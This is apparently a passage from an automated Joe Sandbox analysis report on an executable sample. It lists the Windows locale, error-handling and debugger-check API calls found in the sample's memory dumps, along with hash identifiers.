                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                                                                                                              • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                              • Opcode ID: eb5b5b7fac089f0426b355a02702c6f56c53c0557f9225be1723ca970b37d430
                                                                                                                                                                                                                                                              • Instruction ID: e700cad58dd098324997cefc0835b0a1de2109f154cd5d257480ba148ef63d0c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb5b5b7fac089f0426b355a02702c6f56c53c0557f9225be1723ca970b37d430
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3121B032702100AADB34DF64DA44AD773B6AF74BA0B5A8464E91ADB151FB32DFC1C352
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00A117CA: GetLastError.KERNEL32(?,00000008,00A16C2A), ref: 00A117CE
                                                                                                                                                                                                                                                                • Part of subcall function 00A117CA: SetLastError.KERNEL32(00000000,00A27B20,00000024,00A0E406), ref: 00A11870
                                                                                                                                                                                                                                                              • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00A1A955
                                                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 00A1A99E
                                                                                                                                                                                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 00A1A9AD
                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00A1A9F5
                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00A1AA14
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 415426439-0
                                                                                                                                                                                                                                                              • Opcode ID: c40a4254a20ebd6d35bbee373fcc85eb6215540467412d7d115de5608df417c4
                                                                                                                                                                                                                                                              • Instruction ID: 7dd8eddcca5b825621b0fc48398e3a36791daf10ee2764b1586bca49074c8a0c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c40a4254a20ebd6d35bbee373fcc85eb6215540467412d7d115de5608df417c4
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2451A072A01205AFDB20DFA5DC41BFE73B8BF28740F054469E918E7191E7709AC5CB62
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00A117CA: GetLastError.KERNEL32(?,00000008,00A16C2A), ref: 00A117CE
                                                                                                                                                                                                                                                                • Part of subcall function 00A117CA: SetLastError.KERNEL32(00000000,00A27B20,00000024,00A0E406), ref: 00A11870
                                                                                                                                                                                                                                                              • GetACP.KERNEL32(?,?,?,?,?,?,00A0FBFB,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00A19FA6
                                                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00A0FBFB,?,?,?,00000055,?,-00000050,?,?), ref: 00A19FD1
                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00A1A134
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                                                                                                                                                                                              • String ID: utf8
                                                                                                                                                                                                                                                              • API String ID: 607553120-905460609
                                                                                                                                                                                                                                                              • Opcode ID: 8a3b6f7e6e740fffc63a3053c14778b0fad54de2e24603232d677392583a9256
                                                                                                                                                                                                                                                              • Instruction ID: 20f5c057ed46920c727980f53990f692dc7cbf6f24950aa5170f078902b1c9ae
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8a3b6f7e6e740fffc63a3053c14778b0fad54de2e24603232d677392583a9256
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8471F272601206BADB24AB74CD52BFB73A8EF59740F14446AF606D7181EB70EDC2C762
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00A06E62
                                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00A06F2E
                                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00A06F47
                                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00A06F51
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 254469556-0
                                                                                                                                                                                                                                                              • Opcode ID: 4a07b03eae5818062de844083ec60b615a6b152a0c7dcb6e99ffd47c3ed6d8b8
                                                                                                                                                                                                                                                              • Instruction ID: 2eb5d3fc3903918a37036c87b0499b41f08b2715cd997f593c19b5429157fcbe
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a07b03eae5818062de844083ec60b615a6b152a0c7dcb6e99ffd47c3ed6d8b8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B331E575D0531D9ADF21DFA4E9497CDBBB8AF08300F1041AAE50CAB291EB719A85CF45
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00A117CA: GetLastError.KERNEL32(?,00000008,00A16C2A), ref: 00A117CE
                                                                                                                                                                                                                                                                • Part of subcall function 00A117CA: SetLastError.KERNEL32(00000000,00A27B20,00000024,00A0E406), ref: 00A11870
                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A1A34C
                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A1A396
                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A1A45C
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 661929714-0
                                                                                                                                                                                                                                                              • Opcode ID: 96ef445e79ae80ddd630d0a1997a6b47c8f4b2d4806dd322e8872687ba49fc4c
                                                                                                                                                                                                                                                              • Instruction ID: 745869e0eac2bf388674dc942c562ffc9229f812353197449a38e22c7f70cd9d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 96ef445e79ae80ddd630d0a1997a6b47c8f4b2d4806dd322e8872687ba49fc4c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD61BD759012079FDB289F24DD86BFAB3B9EF24310F10816AE906C6285F774DAD1CB52
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00A0BA0E
                                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00A0BA18
                                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(00A011D4,?,?,?,?,?,00000000), ref: 00A0BA25
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                                                                                                                              • Opcode ID: adb336ace5e1963a056d0dc9650a9b13ad1035b1378785f9cb697b8e6af8a5e5
                                                                                                                                                                                                                                                              • Instruction ID: e02671f217e64384c4e50b25841aebf2401c9e4d487a1e6105b9da66504dd96b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: adb336ace5e1963a056d0dc9650a9b13ad1035b1378785f9cb697b8e6af8a5e5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A31B37491121C9BCB21DF64D989BDDBBB8BF08710F5041EAE81CA72A1E7709F858F54
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __invoke_watson.LIBCMT ref: 00A45C5F
                                                                                                                                                                                                                                                                • Part of subcall function 00A42388: __call_reportfault.LIBCMT ref: 00A42395
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: __call_reportfault__invoke_watson
                                                                                                                                                                                                                                                              • String ID: T
                                                                                                                                                                                                                                                              • API String ID: 3340580077-3187964512
                                                                                                                                                                                                                                                              • Opcode ID: db0833b12c69802265dfdc8630987a7878d7349af451cae304aaa84fa9003980
                                                                                                                                                                                                                                                              • Instruction ID: 98dffee49667786da67c4bcfabb5c6655622c975468a4071f613c95b27b2816e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: db0833b12c69802265dfdc8630987a7878d7349af451cae304aaa84fa9003980
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A352837AE0065ACFDF24CFA8C4813EEB7B1FF95300F54816AD815AB242E7749A45CB91
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,00A1628F,?,?,?,?,?,?,00000000), ref: 00A164C1
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExceptionRaise
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3997070919-0
                                                                                                                                                                                                                                                              • Opcode ID: 3b69f7b500e5d4b3154b99496ad2eb62083af1972d25a55bf37edc06c52b9c80
                                                                                                                                                                                                                                                              • Instruction ID: 5204764ebadc04d567a84178a7bc65ad121e1dd7570e7b369dc1d4b78c4ba4fa
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b69f7b500e5d4b3154b99496ad2eb62083af1972d25a55bf37edc06c52b9c80
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22B14B35610608CFD718CF2CC586BA57BA1FF45364F298698E8EACF2A1C335E991CB40
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 2c3de3d01801f259064517d9d73f3785fe02ed67eb55d44723f82b7acd105287
                                                                                                                                                                                                                                                              • Instruction ID: a277da2b3e774691ceb2e3277981bff359bd11ca03b173b28a47e24f763c3355
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c3de3d01801f259064517d9d73f3785fe02ed67eb55d44723f82b7acd105287
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E4192B580821DAFDB20DF79CC89AEEBBB9AF45300F1442D9E41DD3241DA359E858F50
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00A117CA: GetLastError.KERNEL32(?,00000008,00A16C2A), ref: 00A117CE
                                                                                                                                                                                                                                                                • Part of subcall function 00A117CA: SetLastError.KERNEL32(00000000,00A27B20,00000024,00A0E406), ref: 00A11870
                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A1A59F
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3736152602-0
                                                                                                                                                                                                                                                              • Opcode ID: 6f1001d243bd3c765e84b2fdc31b52f271764fd2b596d5fab0ae178ab94085cc
                                                                                                                                                                                                                                                              • Instruction ID: f0463794363ddea81e2d87fa3a29891ad83863d6ce865b056b908a6407004396
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f1001d243bd3c765e84b2fdc31b52f271764fd2b596d5fab0ae178ab94085cc
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B21B036606206ABDB28AB64DD41AFB73A8EF54314F14407AFD01D6181FB349D81CA51
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00A117CA: GetLastError.KERNEL32(?,00000008,00A16C2A), ref: 00A117CE
                                                                                                                                                                                                                                                                • Part of subcall function 00A117CA: SetLastError.KERNEL32(00000000,00A27B20,00000024,00A0E406), ref: 00A11870
                                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00A1A2F8,00000001,00000000,?,-00000050,?,00A1A929,00000000,?,?,?,00000055,?), ref: 00A1A244
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2417226690-0
                                                                                                                                                                                                                                                              • Opcode ID: 2f1a9bae5fd334ea35e8a80d6be783996adf9170e4e44d3b2a725868b8a4c71c
                                                                                                                                                                                                                                                              • Instruction ID: 38103e999f79b22c2da5b7e22bb356c042164c3d3ab0a4a4b1931ae0334baa8e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f1a9bae5fd334ea35e8a80d6be783996adf9170e4e44d3b2a725868b8a4c71c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA11253A2013015FDB28AF78C8916FAB791FF94769B14852CE94687A50E372A983CB40
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00A117CA: GetLastError.KERNEL32(?,00000008,00A16C2A), ref: 00A117CE
                                                                                                                                                                                                                                                                • Part of subcall function 00A117CA: SetLastError.KERNEL32(00000000,00A27B20,00000024,00A0E406), ref: 00A11870
                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00A1A5F5,00000000,00000000,?), ref: 00A1A7A6
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3736152602-0
                                                                                                                                                                                                                                                              • Opcode ID: 9d2967134290c1cf04369f938d41c21156b955abeb9358d7ae212f3f9d9b999d
                                                                                                                                                                                                                                                              • Instruction ID: 26f788be00cf3a66d051e8e9abc434327a00659a43968fa45112c1a09698b347
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d2967134290c1cf04369f938d41c21156b955abeb9358d7ae212f3f9d9b999d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9AF0F436601112AFDF289B608C45BFA77B8EB507A4F144429EC06E31C0EA34FF82C6D1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00A117CA: GetLastError.KERNEL32(?,00000008,00A16C2A), ref: 00A117CE
                                                                                                                                                                                                                                                                • Part of subcall function 00A117CA: SetLastError.KERNEL32(00000000,00A27B20,00000024,00A0E406), ref: 00A11870
                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00A1A134
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
